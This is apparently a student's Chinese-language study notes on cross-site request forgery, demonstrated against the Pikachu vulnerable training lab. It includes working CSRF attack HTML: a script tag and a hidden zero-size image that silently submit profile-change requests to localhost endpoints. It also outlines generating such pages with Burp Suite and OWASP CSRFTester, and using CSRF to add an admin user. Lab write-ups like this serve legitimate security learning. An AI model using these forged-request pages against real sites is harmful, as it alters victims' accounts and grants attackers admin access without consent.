赞
踩
目录
CSRF(Cross-site request forgery)简称:跨站请求伪造,存在巨大的危害性。是攻击者制造一个请求(一般是一个链接)诱导用户去点击,从而通过用户去访问正常的网站用攻击者伪造的请求去对网站发送一个请求。
1,有这个漏洞(自己弄个号来攻击自己,成功了就说明有这个漏洞)
2,用户已经登录了
3,要知道协议包的结构(不然怎么伪造请求呢)
4,浏览器支持(如没有同源策略)
5,用户点击并打开恶意网站
皮卡丘靶场为例:
环境:受害者为主机,虚拟机搭建恶意网站
在虚拟机中新建一个test.html,恶意网站代码为:
<script src='http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=gg&phonenum=1111&add=
11111&email=111111&submit=submit'>
</script>
2,提交后他打开了小黑子的恶意网站
1,使用bp抓包生成CSRF攻击代码
2,将生成的代码复制到虚拟机的恶意网站中
3,去访问恶意网站后
使用OWASP-CSRFT工具
1,设置浏览器代理
2,开启工具进行抓包
3,用户点击提交后得到数据包:
4,生成一个攻击用的html文档
文档内容:
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head><body>
<H2>OWASP CRSFTester Demonstration</H2>
<img src="http://localhost:80/pkq/vul/csrf/csrfget/csrf_get_edit.php?sex=nang&phonenum=66666666&add=6666666&email=666666&submit=submit&" width="0" height="0" border="0"/>
</body>
</html>
5,将生成的html文件放到恶意网站中
用户去访问恶意网站
1,登录后台
2,新增管理员用户
3,开启抓包
4,将抓取到的包含要用的数据的包生成html文件
5,把文件放入恶意网站中,用户去访问
以上就是我的学习笔记了,谢谢观看!!!(下篇要等到周日发哈)
要高考了,现在一周最多更3篇了
最后一个月高考冲刺会断更到高考结束
高考结束后我会增加基础内容笔记并修改以前写的笔记争取每篇评分达到90分以上哈
后续我还考虑录制视频,关注我一起学习网络安全技术为祖国的护网行动增添新能量。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。